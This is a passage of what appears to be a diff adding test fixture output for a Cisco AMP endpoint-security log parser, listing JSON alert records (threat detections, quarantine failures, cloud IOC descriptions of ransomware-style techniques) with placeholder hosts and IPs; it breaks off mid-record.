"10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:15:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 596000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6533243623469744000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 1358, + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:06:39.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241347137077251", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 657000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241347137077000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "0fe5be3811a98ee6a9c997d3812d911a", + "file.hash.sha1": "cf162622e29bca072d01b274fbbc3ceaacdd13c7", + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "BIT657.tmp", + "file.path": "\\\\?\\C:\\BIT657.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 2295, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 896, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "0fe5be3811a98ee6a9c997d3812d911a", + "cf162622e29bca072d01b274fbbc3ceaacdd13c7" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533241145273614337", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 525000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 5008, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241145273614338", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 619000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "0fe5be3811a98ee6a9c997d3812d911a", + "file.hash.sha1": "cf162622e29bca072d01b274fbbc3ceaacdd13c7", + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "SqGGuYXyy.exe", + "file.path": "\\\\?\\C:\\SqGGuYXyy.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6204, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 896, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "0fe5be3811a98ee6a9c997d3812d911a", + "cf162622e29bca072d01b274fbbc3ceaacdd13c7" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.", + "cisco.amp.cloud_ioc.short_description": "W32.WScriptExecuteFakeExtension.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 875739000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739875754000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "file.name": "WScript.exe", + "file.path": "/C:/Windows/System32/WScript.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 10424, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", + "related.hash": [ + "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.", + "cisco.amp.cloud_ioc.short_description": "W32.Bitsadmin.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 868146000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739868158500, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00", + "file.name": "bitsadmin.exe", + "file.path": "/C:/Windows/System32/bitsadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 12096, + "process.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "related.hash": [ + "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.", + "cisco.amp.cloud_ioc.short_description": "W32.WScriptLaunchedZippedJS.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 846943000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739846959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "file.name": "WScript.exe", + "file.path": "/C:/Windows/System32/WScript.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 14294, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", + "related.hash": [ + "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:04:56.000Z", + "cisco.amp.cloud_ioc.description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 48000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1494576726048000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:04:56.000Z", + "file.hash.sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10", + "file.name": "vssadmin.exe", + "file.path": "/C:/windows/system32/vssadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16006, + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "related.hash": [ + "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:04:49.000Z", + "cisco.amp.cloud_ioc.description": "The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.", + "cisco.amp.cloud_ioc.short_description": "W32.BCDEditDisableRecovery.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 672000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1494576727672000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2021-01-14T10:04:49.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/windows/system32/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 17775, + "process.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:03:40.000Z", + "cisco.amp.cloud_ioc.description": "A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.", + "cisco.amp.cloud_ioc.short_description": "W32.FakeExtensionExec.RET", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 791000000, + "event.action": "Cloud IOC", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1458617561791000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:03:40.000Z", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "/c:/users/rsteadman/downloads/report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 19558, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:01:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6880587034675642558", + "cisco.amp.error.description": "Object path not found", + "cisco.amp.error.error_code": 3221225530, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Unknown", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 396000000, + "event.action": "Quarantine Failure", + "event.dataset": "cisco.amp", + "event.id": 6880587034675643000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e", + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "input.type": "log", + "log.offset": 21167, + "related.hash": [ + "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + ], + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:01:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Generic.Malware.WX.9E93D282", + "cisco.amp.detection_id": "6880587021790740668", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Unknown", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 737000000, + "event.action": "Threat Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 6880587030380676000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48", + "file.name": "p3fci4nu.dll", + "file.path": "\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll", + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 27082, + "process.hash.md5": "23ee3d381cfe3b9f6229483e2ce2f9e1", + "process.hash.sha1": "93cf877f5627e55ec076a656e935042fac39950e", + "process.hash.sha256": "4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57", + "process.name": "csc.exe", + "process.pid": 6708, + "related.hash": [ + "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48" + ], + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T09:56:55.000Z", + "cisco.amp.cloud_ioc.description": "The psexec utility was executed as admin.", + "cisco.amp.cloud_ioc.short_description": "W32.PsexecAsAdmin.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 615000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 460392585524661250, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T09:56:55.000Z", + "file.hash.sha256": "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef", + "file.name": "PsExec.exe", + "file.path": "file:///C%3A/share%24/PsExec.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 28604, + "process.hash.sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386", + "related.hash": [ + "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T07:56:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 758406329, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508191586038317000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 30050, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T05:49:06.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 403000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 7007136035192884000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T05:49:06.000Z", + "file.hash.sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8", + "file.name": "powershell.exe", + "file.path": "file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 31276, + "process.hash.sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8", + "related.hash": [ + "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:37:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296278, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "event.action": "Threat Detected in Low Prevalence Executable", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1515350231459808800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": 